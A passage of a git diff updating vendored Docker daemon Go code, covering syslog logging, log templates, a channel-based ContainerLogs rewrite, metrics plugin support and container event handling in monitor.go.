parseAddress(info.Config["syslog-address"]) if err != nil { return nil, err } - facility, err := parseFacility(ctx.Config["syslog-facility"]) + facility, err := parseFacility(info.Config["syslog-facility"]) if err != nil { return nil, err } - syslogFormatter, syslogFramer, err := parseLogFormat(ctx.Config["syslog-format"], proto) + syslogFormatter, syslogFramer, err := parseLogFormat(info.Config["syslog-format"], proto) if err != nil { return nil, err } var log *syslog.Writer if proto == secureProto { - tlsConfig, tlsErr := parseTLSConfig(ctx.Config) + tlsConfig, tlsErr := parseTLSConfig(info.Config) if tlsErr != nil { return nil, tlsErr } @@ -132,10 +132,13 @@ func New(ctx logger.Context) (logger.Logger, error) { } func (s *syslogger) Log(msg *logger.Message) error { - if msg.Source == "stderr" { - return s.writer.Err(string(msg.Line)) + line := string(msg.Line) + source := msg.Source + logger.PutMessage(msg) + if source == "stderr" { + return s.writer.Err(line) } - return s.writer.Info(string(msg.Line)) + return s.writer.Info(line) } func (s *syslogger) Close() error { @@ -184,6 +187,7 @@ func ValidateLogOpt(cfg map[string]string) error { for key := range cfg { switch key { case "env": + case "env-regex": case "labels": case "syslog-address": case "syslog-facility": diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go index 501561064b..4631788fbb 100644 --- a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go @@ -1,4 +1,4 @@ -package syslog +package syslog // import "github.com/docker/docker/daemon/logger/syslog" import ( "reflect" diff --git a/vendor/github.com/docker/docker/daemon/logger/templates/templates.go b/vendor/github.com/docker/docker/daemon/logger/templates/templates.go new file mode 100644 index 0000000000..ab76d0f1c2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/templates/templates.go @@ -0,0 +1,50 @@ +package templates // import "github.com/docker/docker/daemon/logger/templates" + +import ( + "bytes" + "encoding/json" + "strings" + "text/template" +) + +// basicFunctions are the set of initial +// functions provided to every template. +var basicFunctions = template.FuncMap{ + "json": func(v interface{}) string { + buf := &bytes.Buffer{} + enc := json.NewEncoder(buf) + enc.SetEscapeHTML(false) + enc.Encode(v) + // Remove the trailing new line added by the encoder + return strings.TrimSpace(buf.String()) + }, + "split": strings.Split, + "join": strings.Join, + "title": strings.Title, + "lower": strings.ToLower, + "upper": strings.ToUpper, + "pad": padWithSpace, + "truncate": truncateWithLength, +} + +// NewParse creates a new tagged template with the basic functions +// and parses the given format. +func NewParse(tag, format string) (*template.Template, error) { + return template.New(tag).Funcs(basicFunctions).Parse(format) +} + +// padWithSpace adds whitespace to the input if the input is non-empty +func padWithSpace(source string, prefix, suffix int) string { + if source == "" { + return source + } + return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix) +} + +// truncateWithLength truncates the source string up to the length provided by the input +func truncateWithLength(source string, length int) string { + if len(source) < length { + return source + } + return source[:length] +} diff --git a/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go b/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go new file mode 100644 index 0000000000..25e7c88750 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go @@ -0,0 +1,19 @@ +package templates // import "github.com/docker/docker/daemon/logger/templates" + +import ( + "bytes" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestNewParse(t *testing.T) { + tm, err := NewParse("foo", "this is a {{ . }}") + assert.Check(t, err) + + var b bytes.Buffer + assert.Check(t, tm.Execute(&b, "string")) + want := "this is a string" + assert.Check(t, is.Equal(want, b.String())) +} diff --git a/vendor/github.com/docker/docker/daemon/logs.go b/vendor/github.com/docker/docker/daemon/logs.go index cc34b82083..37ca4caf63 100644 --- a/vendor/github.com/docker/docker/daemon/logs.go +++ b/vendor/github.com/docker/docker/daemon/logs.go @@ -1,123 +1,175 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "io" + "context" "strconv" "time" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" containertypes "github.com/docker/docker/api/types/container" timetypes "github.com/docker/docker/api/types/time" "github.com/docker/docker/container" "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/stdcopy" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -// ContainerLogs hooks up a container's stdout and stderr streams -// configured with the given struct. -func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *backend.ContainerLogsConfig, started chan struct{}) error { +// ContainerLogs copies the container's log channel to the channel provided in +// the config. If ContainerLogs returns an error, no messages have been copied. +// and the channel will be closed without data. +// +// if it returns nil, the config channel will be active and return log +// messages until it runs out or the context is canceled. +func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *types.ContainerLogsOptions) (messages <-chan *backend.LogMessage, isTTY bool, retErr error) { + lg := logrus.WithFields(logrus.Fields{ + "module": "daemon", + "method": "(*Daemon).ContainerLogs", + "container": containerName, + }) + + if !(config.ShowStdout || config.ShowStderr) { + return nil, false, errdefs.InvalidParameter(errors.New("You must choose at least one stream")) + } container, err := daemon.GetContainer(containerName) if err != nil { - return err + return nil, false, err } - if !(config.ShowStdout || config.ShowStderr) { - return fmt.Errorf("You must choose at least one stream") + if container.RemovalInProgress || container.Dead { + return nil, false, errdefs.Conflict(errors.New("can not get logs from container which is dead or marked for removal")) } - cLog, err := daemon.getLogger(container) + if container.HostConfig.LogConfig.Type == "none" { + return nil, false, logger.ErrReadLogsNotSupported{} + } + + cLog, cLogCreated, err := daemon.getLogger(container) if err != nil { - return err + return nil, false, err } + if cLogCreated { + defer func() { + if retErr != nil { + if err = cLog.Close(); err != nil { + logrus.Errorf("Error closing logger: %v", err) + } + } + }() + } + logReader, ok := cLog.(logger.LogReader) if !ok { - return logger.ErrReadLogsNotSupported + return nil, false, logger.ErrReadLogsNotSupported{} } - follow := config.Follow && container.IsRunning() + follow := config.Follow && !cLogCreated tailLines, err := strconv.Atoi(config.Tail) if err != nil { tailLines = -1 } - logrus.Debug("logs: begin stream") - var since time.Time if config.Since != "" { s, n, err := timetypes.ParseTimestamps(config.Since, 0) if err != nil { - return err + return nil, false, err } since = time.Unix(s, n) } + + var until time.Time + if config.Until != "" && config.Until != "0" { + s, n, err := timetypes.ParseTimestamps(config.Until, 0) + if err != nil { + return nil, false, err + } + until = time.Unix(s, n) + } + readConfig := logger.ReadConfig{ Since: since, + Until: until, Tail: tailLines, Follow: follow, } + logs := logReader.ReadLogs(readConfig) - wf := ioutils.NewWriteFlusher(config.OutStream) - defer wf.Close() - close(started) - wf.Flush() - - var outStream io.Writer - outStream = wf - errStream := outStream - if !container.Config.Tty { - errStream = stdcopy.NewStdWriter(outStream, stdcopy.Stderr) - outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) - } - - for { - select { - case err := <-logs.Err: - logrus.Errorf("Error streaming logs: %v", err) - return nil - case <-ctx.Done(): - logs.Close() - return nil - case msg, ok := <-logs.Msg: - if !ok { - logrus.Debug("logs: end stream") - logs.Close() - if cLog != container.LogDriver { - // Since the logger isn't cached in the container, which occurs if it is running, it - // must get explicitly closed here to avoid leaking it and any file handles it has. - if err := cLog.Close(); err != nil { - logrus.Errorf("Error closing logger: %v", err) - } + // past this point, we can't possibly return any errors, so we can just + // start a goroutine and return to tell the caller not to expect errors + // (if the caller wants to give up on logs, they have to cancel the context) + // this goroutine functions as a shim between the logger and the caller. + messageChan := make(chan *backend.LogMessage, 1) + go func() { + if cLogCreated { + defer func() { + if err = cLog.Close(); err != nil { + logrus.Errorf("Error closing logger: %v", err) + } + }() + } + // set up some defers + defer logs.Close() + + // close the messages channel. closing is the only way to signal above + // that we're doing with logs (other than context cancel i guess). + defer close(messageChan) + + lg.Debug("begin logs") + for { + select { + // i do not believe as the system is currently designed any error + // is possible, but we should be prepared to handle it anyway. if + // we do get an error, copy only the error field to a new object so + // we don't end up with partial data in the other fields + case err := <-logs.Err: + lg.Errorf("Error streaming logs: %v", err) + select { + case <-ctx.Done(): + case messageChan <- &backend.LogMessage{Err: err}: + } + return + case <-ctx.Done(): + lg.Debugf("logs: end stream, ctx is done: %v", ctx.Err()) + return + case msg, ok := <-logs.Msg: + // there is some kind of pool or ring buffer in the logger that + // produces these messages, and a possible future optimization + // might be to use that pool and reuse message objects + if !ok { + lg.Debug("end logs") + return + } + m := msg.AsLogMessage() // just a pointer conversion, does not copy data + + // there could be a case where the reader stops accepting + // messages and the context is canceled. we need to check that + // here, or otherwise we risk blocking forever on the message + // send. + select { + case <-ctx.Done(): + return + case messageChan <- m: } - return nil - } - logLine := msg.Line - if config.Details { - logLine = append([]byte(msg.Attrs.String()+" "), logLine...) - } - if config.Timestamps { - logLine = append([]byte(msg.Timestamp.Format(logger.TimeFormat)+" "), logLine...) - } - if msg.Source == "stdout" && config.ShowStdout { - outStream.Write(logLine) - } - if msg.Source == "stderr" && config.ShowStderr { - errStream.Write(logLine) } } - } + }() + return messageChan, container.Config.Tty, nil } -func (daemon *Daemon) getLogger(container *container.Container) (logger.Logger, error) { - if container.LogDriver != nil && container.IsRunning() { - return container.LogDriver, nil +func (daemon *Daemon) getLogger(container *container.Container) (l logger.Logger, created bool, err error) { + container.Lock() + if container.State.Running { + l = container.LogDriver } - return container.StartLogger(container.HostConfig.LogConfig) + container.Unlock() + if l == nil { + created = true + l, err = container.StartLogger() + } + return } // mergeLogConfig merges the daemon log config to the container's log config if the container's log driver is not specified. @@ -140,3 +192,18 @@ func (daemon *Daemon) mergeAndVerifyLogConfig(cfg *containertypes.LogConfig) err return logger.ValidateLogOpts(cfg.Type, cfg.Config) } + +func (daemon *Daemon) setupDefaultLogConfig() error { + config := daemon.configStore + if len(config.LogConfig.Config) > 0 { + if err := logger.ValidateLogOpts(config.LogConfig.Type, config.LogConfig.Config); err != nil { + return errors.Wrap(err, "failed to set log opts") + } + } + daemon.defaultLogConfig = containertypes.LogConfig{ + Type: config.LogConfig.Type, + Config: config.LogConfig.Config, + } + logrus.Debugf("Using default logging driver %s", daemon.defaultLogConfig.Type) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logs_test.go b/vendor/github.com/docker/docker/daemon/logs_test.go index 0c36299e09..a32691a80c 100644 --- a/vendor/github.com/docker/docker/daemon/logs_test.go +++ b/vendor/github.com/docker/docker/daemon/logs_test.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "testing" diff --git a/vendor/github.com/docker/docker/daemon/metrics.go b/vendor/github.com/docker/docker/daemon/metrics.go index 69dbfd9378..f6961a3553 100644 --- a/vendor/github.com/docker/docker/daemon/metrics.go +++ b/vendor/github.com/docker/docker/daemon/metrics.go @@ -1,16 +1,29 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" -import "github.com/docker/go-metrics" +import ( + "sync" + + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/go-metrics" + "github.com/pkg/errors" + "github.com/prometheus/client_golang/prometheus" + "github.com/sirupsen/logrus" +) + +const metricsPluginType = "MetricsCollector" var ( containerActions metrics.LabeledTimer - imageActions metrics.LabeledTimer networkActions metrics.LabeledTimer - engineVersion metrics.LabeledGauge + engineInfo metrics.LabeledGauge engineCpus metrics.Gauge engineMemory metrics.Gauge healthChecksCounter metrics.Counter healthChecksFailedCounter metrics.Counter + + stateCtr *stateCounter ) func init() { @@ -25,18 +38,155 @@ func init() { } { containerActions.WithValues(a).Update(0) } + networkActions = ns.NewLabeledTimer("network_actions", "The number of seconds it takes to process each network action", "action") - engineVersion = ns.NewLabeledGauge("engine", "The version and commit information for the engine process", metrics.Unit("info"), + engineInfo = ns.NewLabeledGauge("engine", "The information related to the engine and the OS it is running on", metrics.Unit("info"), "version", "commit", "architecture", - "graph_driver", "kernel", - "os", + "graphdriver", + "kernel", "os", + "os_type", + "daemon_id", // ID is a randomly generated unique identifier (e.g. UUID4) ) engineCpus = ns.NewGauge("engine_cpus", "The number of cpus that the host system of the engine has", metrics.Unit("cpus")) engineMemory = ns.NewGauge("engine_memory", "The number of bytes of memory that the host system of the engine has", metrics.Bytes) healthChecksCounter = ns.NewCounter("health_checks", "The total number of health checks") healthChecksFailedCounter = ns.NewCounter("health_checks_failed", "The total number of failed health checks") - imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action") + + stateCtr = newStateCounter(ns.NewDesc("container_states", "The count of containers in various states", metrics.Unit("containers"), "state")) + ns.Add(stateCtr) + metrics.Register(ns) } + +type stateCounter struct { + mu sync.Mutex + states map[string]string + desc *prometheus.Desc +} + +func newStateCounter(desc *prometheus.Desc) *stateCounter { + return &stateCounter{ + states: make(map[string]string), + desc: desc, + } +} + +func (ctr *stateCounter) get() (running int, paused int, stopped int) { + ctr.mu.Lock() + defer ctr.mu.Unlock() + + states := map[string]int{ + "running": 0, + "paused": 0, + "stopped": 0, + } + for _, state := range ctr.states { + states[state]++ + } + return states["running"], states["paused"], states["stopped"] +} + +func (ctr *stateCounter) set(id, label string) { + ctr.mu.Lock() + ctr.states[id] = label + ctr.mu.Unlock() +} + +func (ctr *stateCounter) del(id string) { + ctr.mu.Lock() + delete(ctr.states, id) + ctr.mu.Unlock() +} + +func (ctr *stateCounter) Describe(ch chan<- *prometheus.Desc) { + ch <- ctr.desc +} + +func (ctr *stateCounter) Collect(ch chan<- prometheus.Metric) { + running, paused, stopped := ctr.get() + ch <- prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(running), "running") + ch <- prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(paused), "paused") + ch <- prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(stopped), "stopped") +} + +func (d *Daemon) cleanupMetricsPlugins() { + ls := d.PluginStore.GetAllManagedPluginsByCap(metricsPluginType) + var wg sync.WaitGroup + wg.Add(len(ls)) + + for _, plugin := range ls { + p := plugin + go func() { + defer wg.Done() + + adapter, err := makePluginAdapter(p) + if err != nil { + logrus.WithError(err).WithField("plugin", p.Name()).Error("Error creating metrics plugin adapater") + return + } + if err := adapter.StopMetrics(); err != nil { + logrus.WithError(err).WithField("plugin", p.Name()).Error("Error stopping plugin metrics collection") + } + }() + } + wg.Wait() + + if d.metricsPluginListener != nil { + d.metricsPluginListener.Close() + } +} + +type metricsPlugin interface { + StartMetrics() error + StopMetrics() error +} + +func makePluginAdapter(p plugingetter.CompatPlugin) (metricsPlugin, error) { // nolint: interfacer + if pc, ok := p.(plugingetter.PluginWithV1Client); ok { + return &metricsPluginAdapter{pc.Client(), p.Name()}, nil + } + + pa, ok := p.(plugingetter.PluginAddr) + if !ok { + return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", p)) + } + + if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 { + return nil, errors.Errorf("plugin protocol not supported: %s", pa.Protocol()) + } + + addr := pa.Addr() + client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout()) + if err != nil { + return nil, errors.Wrap(err, "error creating metrics plugin client") + } + return &metricsPluginAdapter{client, p.Name()}, nil +} + +type metricsPluginAdapter struct { + c *plugins.Client + name string +} + +func (a *metricsPluginAdapter) StartMetrics() error { + type metricsPluginResponse struct { + Err string + } + var res metricsPluginResponse + if err := a.c.Call(metricsPluginType+".StartMetrics", nil, &res); err != nil { + return errors.Wrap(err, "could not start metrics plugin") + } + if res.Err != "" { + return errors.New(res.Err) + } + return nil +} + +func (a *metricsPluginAdapter) StopMetrics() error { + if err := a.c.Call(metricsPluginType+".StopMetrics", nil, nil); err != nil { + return errors.Wrap(err, "error stopping metrics collector") + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/metrics_unix.go b/vendor/github.com/docker/docker/daemon/metrics_unix.go new file mode 100644 index 0000000000..452424e685 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/metrics_unix.go @@ -0,0 +1,60 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "net" + "net/http" + "path/filepath" + + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/plugin" + "github.com/docker/go-metrics" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" +) + +func (daemon *Daemon) listenMetricsSock() (string, error) { + path := filepath.Join(daemon.configStore.ExecRoot, "metrics.sock") + unix.Unlink(path) + l, err := net.Listen("unix", path) + if err != nil { + return "", errors.Wrap(err, "error setting up metrics plugin listener") + } + + mux := http.NewServeMux() + mux.Handle("/metrics", metrics.Handler()) + go func() { + http.Serve(l, mux) + }() + daemon.metricsPluginListener = l + return path, nil +} + +func registerMetricsPluginCallback(store *plugin.Store, sockPath string) { + store.RegisterRuntimeOpt(metricsPluginType, func(s *specs.Spec) { + f := plugin.WithSpecMounts([]specs.Mount{ + {Type: "bind", Source: sockPath, Destination: "/run/docker/metrics.sock", Options: []string{"bind", "ro"}}, + }) + f(s) + }) + store.Handle(metricsPluginType, func(name string, client *plugins.Client) { + // Use lookup since nothing in the system can really reference it, no need + // to protect against removal + p, err := store.Get(name, metricsPluginType, plugingetter.Lookup) + if err != nil { + return + } + + adapter, err := makePluginAdapter(p) + if err != nil { + logrus.WithError(err).WithField("plugin", p.Name()).Error("Error creating plugin adapater") + } + if err := adapter.StartMetrics(); err != nil { + logrus.WithError(err).WithField("plugin", p.Name()).Error("Error starting metrics collector plugin") + } + }) +} diff --git a/vendor/github.com/docker/docker/daemon/metrics_unsupported.go b/vendor/github.com/docker/docker/daemon/metrics_unsupported.go new file mode 100644 index 0000000000..653c77fc32 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/metrics_unsupported.go @@ -0,0 +1,12 @@ +// +build windows + +package daemon // import "github.com/docker/docker/daemon" + +import "github.com/docker/docker/pkg/plugingetter" + +func registerMetricsPluginCallback(getter plugingetter.PluginGetter, sockPath string) { +} + +func (daemon *Daemon) listenMetricsSock() (string, error) { + return "", nil +} diff --git a/vendor/github.com/docker/docker/daemon/monitor.go b/vendor/github.com/docker/docker/daemon/monitor.go index ee0d1fcce0..5e740dd4fe 100644 --- a/vendor/github.com/docker/docker/daemon/monitor.go +++ b/vendor/github.com/docker/docker/daemon/monitor.go @@ -1,132 +1,212 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "errors" "fmt" "runtime" "strconv" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" + "github.com/docker/docker/container" "github.com/docker/docker/libcontainerd" "github.com/docker/docker/restartmanager" + "github.com/sirupsen/logrus" ) -// StateChanged updates daemon state changes from containerd -func (daemon *Daemon) StateChanged(id string, e libcontainerd.StateInfo) error { - c := daemon.containers.Get(id) - if c == nil { +func (daemon *Daemon) setStateCounter(c *container.Container) { + switch c.StateString() { + case "paused": + stateCtr.set(c.ID, "paused") + case "running": + stateCtr.set(c.ID, "running") + default: + stateCtr.set(c.ID, "stopped") + } +} + +// ProcessEvent is called by libcontainerd whenever an event occurs +func (daemon *Daemon) ProcessEvent(id string, e libcontainerd.EventType, ei libcontainerd.EventInfo) error { + c, err := daemon.GetContainer(id) + if c == nil || err != nil { return fmt.Errorf("no such container: %s", id) } - switch e.State { - case libcontainerd.StateOOM: + switch e { + case libcontainerd.EventOOM: // StateOOM is Linux specific and should never be hit on Windows if runtime.GOOS == "windows" { - return errors.New("Received StateOOM from libcontainerd on Windows. This should never happen.") + return errors.New("received StateOOM from libcontainerd on Windows. This should never happen") } + + c.Lock() + defer c.Unlock() daemon.updateHealthMonitor(c) + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + return err + } + daemon.LogContainerEvent(c, "oom") - case libcontainerd.StateExit: - // if container's AutoRemove flag is set, remove it after clean up - autoRemove := func() { - if c.HostConfig.AutoRemove { - if err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil { - logrus.Errorf("can't remove container %s: %v", c.ID, err) - } + case libcontainerd.EventExit: + if int(ei.Pid) == c.Pid { + c.Lock() + _, _, err := daemon.containerd.DeleteTask(context.Background(), c.ID) + if err != nil { + logrus.WithError(err).Warnf("failed to delete container %s from containerd", c.ID) } - } - c.Lock() - c.StreamConfig.Wait() - c.Reset(false) + c.StreamConfig.Wait() + c.Reset(false) - restart, wait, err := c.RestartManager().ShouldRestart(e.ExitCode, false, time.Since(c.StartedAt)) - if err == nil && restart { - c.RestartCount++ - c.SetRestarting(platformConstructExitStatus(e)) - } else { - c.SetStopped(platformConstructExitStatus(e)) - defer autoRemove() - } + exitStatus := container.ExitStatus{ + ExitCode: int(ei.ExitCode), + ExitedAt: ei.ExitedAt, + OOMKilled: ei.OOMKilled, + } + restart, wait, err := c.RestartManager().ShouldRestart(ei.ExitCode, daemon.IsShuttingDown() || c.HasBeenManuallyStopped, time.Since(c.StartedAt)) + if err == nil && restart { + c.RestartCount++ + c.SetRestarting(&exitStatus) + } else { + if ei.Error != nil { + c.SetError(ei.Error) + } + c.SetStopped(&exitStatus) + defer daemon.autoRemove(c) + } + defer c.Unlock() // needs to be called before autoRemove - daemon.updateHealthMonitor(c) - attributes := map[string]string{ - "exitCode": strconv.Itoa(int(e.ExitCode)), - } - daemon.LogContainerEventWithAttributes(c, "die", attributes) - daemon.Cleanup(c) - - if err == nil && restart { - go func() { - err := <-wait - if err == nil { - if err = daemon.containerStart(c, "", "", false); err != nil { - logrus.Debugf("failed to restart container: %+v", err) + // cancel healthcheck here, they will be automatically + // restarted if/when the container is started again + daemon.stopHealthchecks(c) + attributes := map[string]string{ + "exitCode": strconv.Itoa(int(ei.ExitCode)), + } + daemon.LogContainerEventWithAttributes(c, "die", attributes) + daemon.Cleanup(c) + + if err == nil && restart { + go func() { + err := <-wait + if err == nil { + // daemon.netController is initialized when daemon is restoring containers. + // But containerStart will use daemon.netController segment. + // So to avoid panic at startup process, here must wait util daemon restore done. + daemon.waitForStartupDone() + if err = daemon.containerStart(c, "", "", false); err != nil { + logrus.Debugf("failed to restart container: %+v", err) + } } - } - if err != nil { - c.SetStopped(platformConstructExitStatus(e)) - defer autoRemove() - if err != restartmanager.ErrRestartCanceled { - logrus.Errorf("restartmanger wait error: %+v", err) + if err != nil { + c.Lock() + c.SetStopped(&exitStatus) + c.Unlock() + defer daemon.autoRemove(c) + if err != restartmanager.ErrRestartCanceled { + logrus.Errorf("restartmanger wait error: %+v", err) + } } - } - }() - } + }() + } - defer c.Unlock() - if err := c.ToDisk(); err != nil { - return err + daemon.setStateCounter(c) + return c.CheckpointTo(daemon.containersReplica) } - return daemon.postRunProcessing(c, e) - case libcontainerd.StateExitProcess: - if execConfig := c.ExecCommands.Get(e.ProcessID); execConfig != nil { - ec := int(e.ExitCode) + + if execConfig := c.ExecCommands.Get(ei.ProcessID); execConfig != nil { + ec := int(ei.ExitCode) execConfig.Lock() defer execConfig.Unlock() execConfig.ExitCode = &ec execConfig.Running = false execConfig.StreamConfig.Wait() if err := execConfig.CloseStreams(); err != nil { - logrus.Errorf("%s: %s", c.ID, err) + logrus.Errorf("failed to cleanup exec %s streams: %s", c.ID, err) } // remove the exec command from the container's store only and not the // daemon's store so that the exec command can be inspected. - c.ExecCommands.Delete(execConfig.ID) + c.ExecCommands.Delete(execConfig.ID, execConfig.Pid) + attributes := map[string]string{ + "execID": execConfig.ID, + "exitCode": strconv.Itoa(ec), + } + daemon.LogContainerEventWithAttributes(c, "exec_die", attributes) } else { - logrus.Warnf("Ignoring StateExitProcess for %v but no exec command found", e) + logrus.WithFields(logrus.Fields{ + "container": c.ID, + "exec-id": ei.ProcessID, + "exec-pid": ei.Pid, + }).Warnf("Ignoring Exit Event, no such exec command found") } - case libcontainerd.StateStart, libcontainerd.StateRestore: - // Container is already locked in this case - c.SetRunning(int(e.Pid), e.State == libcontainerd.StateStart) - c.HasBeenManuallyStopped = false - c.HasBeenStartedBefore = true - if err := c.ToDisk(); err != nil { - c.Reset(false) - return err + case libcontainerd.EventStart: + c.Lock() + defer c.Unlock() + + // This is here to handle start not generated by docker + if !c.Running { + c.SetRunning(int(ei.Pid), false) + c.HasBeenManuallyStopped = false + c.HasBeenStartedBefore = true + daemon.setStateCounter(c) + + daemon.initHealthMonitor(c) + + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + return err + } + daemon.LogContainerEvent(c, "start") } - daemon.initHealthMonitor(c) - daemon.LogContainerEvent(c, "start") - case libcontainerd.StatePause: - // Container is already locked in this case - c.Paused = true - if err := c.ToDisk(); err != nil { - return err + + case libcontainerd.EventPaused: + c.Lock() + defer c.Unlock() + + if !c.Paused { + c.Paused = true + daemon.setStateCounter(c) + daemon.updateHealthMonitor(c) + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + return err + } + daemon.LogContainerEvent(c, "pause") } - daemon.updateHealthMonitor(c) - daemon.LogContainerEvent(c, "pause") - case libcontainerd.StateResume: - // Container is already locked in this case - c.Paused = false - if err := c.ToDisk(); err != nil { - return err + case libcontainerd.EventResumed: + c.Lock() + defer c.Unlock() + + if c.Paused { + c.Paused = false + daemon.setStateCounter(c) + daemon.updateHealthMonitor(c) + + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + return err + } + daemon.LogContainerEvent(c, "unpause") } - daemon.updateHealthMonitor(c) - daemon.LogContainerEvent(c, "unpause") } - return nil } + +func (daemon *Daemon) autoRemove(c *container.Container) { + c.Lock() + ar := c.HostConfig.AutoRemove + c.Unlock() + if !ar { + return + } + + var err error + if err = daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err == nil { + return + } + if c := daemon.containers.Get(c.ID); c == nil { + return + } + + if err != nil { + logrus.WithError(err).WithField("container", c.ID).Error("error removing container") + } +} diff --git a/vendor/github.com/docker/docker/daemon/monitor_linux.go b/vendor/github.com/docker/docker/daemon/monitor_linux.go deleted file mode 100644 index 09f5af50c6..0000000000 --- a/vendor/github.com/docker/docker/daemon/monitor_linux.go +++ /dev/null @@ -1,19 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/container" - "github.com/docker/docker/libcontainerd" -) - -// platformConstructExitStatus returns a platform specific exit status structure -func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { - return &container.ExitStatus{ - ExitCode: int(e.ExitCode), - OOMKilled: e.OOMKilled, - } -} - -// postRunProcessing perfoms any processing needed on the container after it has stopped. -func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/monitor_solaris.go b/vendor/github.com/docker/docker/daemon/monitor_solaris.go deleted file mode 100644 index 5ccfada76a..0000000000 --- a/vendor/github.com/docker/docker/daemon/monitor_solaris.go +++ /dev/null @@ -1,18 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/container" - "github.com/docker/docker/libcontainerd" -) - -// platformConstructExitStatus returns a platform specific exit status structure -func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { - return &container.ExitStatus{ - ExitCode: int(e.ExitCode), - } -} - -// postRunProcessing perfoms any processing needed on the container after it has stopped. -func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/monitor_windows.go b/vendor/github.com/docker/docker/daemon/monitor_windows.go deleted file mode 100644 index 9648b1b415..0000000000 --- a/vendor/github.com/docker/docker/daemon/monitor_windows.go +++ /dev/null @@ -1,46 +0,0 @@ -package daemon - -import ( - "fmt" - - "github.com/docker/docker/container" - "github.com/docker/docker/libcontainerd" -) - -// platformConstructExitStatus returns a platform specific exit status structure -func platformConstructExitStatus(e libcontainerd.StateInfo) *container.ExitStatus { - return &container.ExitStatus{ - ExitCode: int(e.ExitCode), - } -} - -// postRunProcessing perfoms any processing needed on the container after it has stopped. -func (daemon *Daemon) postRunProcessing(container *container.Container, e libcontainerd.StateInfo) error { - if e.ExitCode == 0 && e.UpdatePending { - spec, err := daemon.createSpec(container) - if err != nil { - return err - } - - newOpts := []libcontainerd.CreateOption{&libcontainerd.ServicingOption{ - IsServicing: true, - }} - - copts, err := daemon.getLibcontainerdCreateOptions(container) - if err != nil { - return err - } - - if copts != nil { - newOpts = append(newOpts, copts...) - } - - // Create a new servicing container, which will start, complete the update, and merge back the - // results if it succeeded, all as part of the below function call. - if err := daemon.containerd.Create((container.ID + "_servicing"), "", "", *spec, container.InitializeStdio, newOpts...); err != nil { - container.SetExitCode(-1) - return fmt.Errorf("Post-run update servicing failed: %s", err) - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/mounts.go b/vendor/github.com/docker/docker/daemon/mounts.go index 1c11f86a80..383a38e7eb 100644 --- a/vendor/github.com/docker/docker/daemon/mounts.go +++ b/vendor/github.com/docker/docker/daemon/mounts.go @@ -1,11 +1,13 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "strings" + mounttypes "github.com/docker/docker/api/types/mount" "github.com/docker/docker/container" - volumestore "github.com/docker/docker/volume/store" + volumesservice "github.com/docker/docker/volume/service" ) func (daemon *Daemon) prepareMountPoints(container *container.Container) error { @@ -19,28 +21,33 @@ func (daemon *Daemon) prepareMountPoints(container *container.Container) error { func (daemon *Daemon) removeMountPoints(container *container.Container, rm bool) error { var rmErrors []string + ctx := context.TODO() for _, m := range container.MountPoints { - if m.Volume == nil { + if m.Type != mounttypes.TypeVolume || m.Volume == nil { continue } - daemon.volumes.Dereference(m.Volume, 